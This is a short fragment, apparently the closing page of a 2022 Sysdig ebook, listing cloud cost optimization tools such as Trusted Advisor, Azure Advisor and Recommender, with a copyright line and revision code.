Cloud cost optimization | Trusted Advisor | Azure Advisor | Recommender


www.sysdig.com
Copyright © 2022 Sysdig, Inc. All rights reserved. eBK-004 Rev. A 4/22
